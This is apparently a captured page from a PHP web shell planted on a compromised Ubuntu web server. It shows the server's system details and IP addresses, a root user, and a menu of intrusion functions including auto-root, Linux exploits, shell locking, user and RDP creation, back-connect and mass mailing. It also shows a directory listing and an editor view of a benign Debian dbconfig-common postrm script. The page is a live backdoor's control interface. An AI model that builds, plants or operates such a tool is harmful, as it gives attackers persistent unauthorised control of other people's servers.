Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
dbconfig-common /
dpkg /
[ HOME SHELL ]
Name
Size
Permission
Action
common
38.37
KB
-rw-r--r--
config
22.05
KB
-rw-r--r--
config.mysql
68
B
-rw-r--r--
config.pgsql
69
B
-rw-r--r--
config.sqlite
70
B
-rw-r--r--
config.sqlite3
71
B
-rw-r--r--
frontend.config
61
B
-rw-r--r--
frontend.config.mysql
67
B
-rw-r--r--
frontend.config.pgsql
67
B
-rw-r--r--
frontend.postinst
63
B
-rw-r--r--
frontend.postinst.mysql
69
B
-rw-r--r--
frontend.postinst.pgsql
69
B
-rw-r--r--
frontend.postrm
61
B
-rw-r--r--
frontend.postrm.mysql
67
B
-rw-r--r--
frontend.postrm.pgsql
67
B
-rw-r--r--
frontend.preinst
62
B
-rw-r--r--
frontend.preinst.mysql
68
B
-rw-r--r--
frontend.preinst.pgsql
68
B
-rw-r--r--
frontend.prerm
60
B
-rw-r--r--
frontend.prerm.mysql
66
B
-rw-r--r--
frontend.prerm.pgsql
66
B
-rw-r--r--
postinst
20.29
KB
-rw-r--r--
postinst.mysql
70
B
-rw-r--r--
postinst.pgsql
70
B
-rw-r--r--
postinst.sqlite
71
B
-rw-r--r--
postinst.sqlite3
72
B
-rw-r--r--
postrm
986
B
-rw-r--r--
postrm.mysql
68
B
-rw-r--r--
postrm.pgsql
68
B
-rw-r--r--
postrm.sqlite
69
B
-rw-r--r--
postrm.sqlite3
70
B
-rw-r--r--
preinst
431
B
-rw-r--r--
preinst.mysql
69
B
-rw-r--r--
preinst.pgsql
70
B
-rw-r--r--
preinst.sqlite
70
B
-rw-r--r--
preinst.sqlite3
71
B
-rw-r--r--
prerm
5.69
KB
-rw-r--r--
prerm.mysql
67
B
-rw-r--r--
prerm.pgsql
67
B
-rw-r--r--
prerm.sqlite
68
B
-rw-r--r--
prerm.sqlite3
69
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : postrm
# -*- mode: sh -*- ### ### source common stuff ### dbc_go(){ . /usr/share/dbconfig-common/dpkg/common local cfg _dbc_debug "(postrm) dbc_go() $@" dbc_config "$@" || return $? if [ "$dbc_command" = "upgrade" ]; then ## With dbconfig-no-thanks installed we don't need to do anything. if dbc_no_thanks ; then return 0 fi dbc_read_package_config || return $? dbc_preseed_package_debconf || return $? elif [ "$dbc_command" = "purge" ]; then # remove the dbc configuration file rm -f /etc/dbconfig-common/$dbc_package.conf || true if which ucf >/dev/null 2>&1; then cfg="/etc/dbconfig-common/$dbc_package.conf" ucf -p "$cfg" || true ucfr -p "$dbc_package" "$cfg" fi # forget everything we ever knew related to debconf+dbc for t in $dbc_register_templates; do db_unregister $dbc_package/$t || true done fi }
Close